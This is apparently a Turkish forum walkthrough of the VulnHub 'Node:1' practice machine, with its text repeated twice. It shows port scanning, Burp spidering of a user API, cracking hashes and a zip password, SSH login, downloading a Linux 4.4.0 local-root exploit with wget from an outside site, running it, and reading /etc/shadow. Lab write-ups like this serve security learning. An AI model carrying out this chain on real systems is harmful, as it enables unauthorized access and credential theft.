- 9 Tem 2009
- 1,036
- 18
Merhaba arkadaşlar.
Bu konumda sizlere Node:1 orta seviye açıklı makinenin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.
Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:
https://www.vulnhub.com/entry/node-1,252/#
Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.
https://www.turkhackteam.org/siber-...ulnupload-acikli-makine-cozumu-ch_arli41.html
Bu komut bize modeme bağlı cihazları listeliyor.Ordan ipyi kopyalıyoruz.
Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.
Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.
Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.
Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.
Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.
Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.
Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.
hash-identifier
Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.
Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.
Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.
Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.
Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.
Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.
Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.
Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.
Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.
cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.
gcc dosya-adi.c -o ch_arli41
Bu komut ile c dilinde yazılmış exploiti derliyorum.
Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.
Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.
Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..
Bu konumda sizlere Node:1 orta seviye açıklı makinenin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.
Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:
https://www.vulnhub.com/entry/node-1,252/#
Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.
https://www.turkhackteam.org/siber-...ulnupload-acikli-makine-cozumu-ch_arli41.html
Kod:
netdiscover
Bu komut bize modeme bağlı cihazları listeliyor.Ordan ipyi kopyalıyoruz.
Kod:
nmap ipadresi
Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.
Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.
Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.
Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.
Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.
Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.
Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.
hash-identifier
Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.
Kod:
john --show --format=raw-sha256 /sifreler.txt
Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.
Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.
Kod:
cat myplace.backup | base64 -d > ch_arli41
Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.
Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.
Kod:
fcrackzip -u -D -p wordlist.txt ch_arli41
Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.
Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.
Kod:
ssh mark@ipadresi
Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.
Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.
Kod:
cd /tmp
Kod:
wget http://cyseclabs.com/pub/upstream44.c
cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.
gcc dosya-adi.c -o ch_arli41
Bu komut ile c dilinde yazılmış exploiti derliyorum.
Kod:
./ch_arli41
Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.
Kod:
cd ..
cat /etc/shadow
Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.
Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..
Son düzenleme: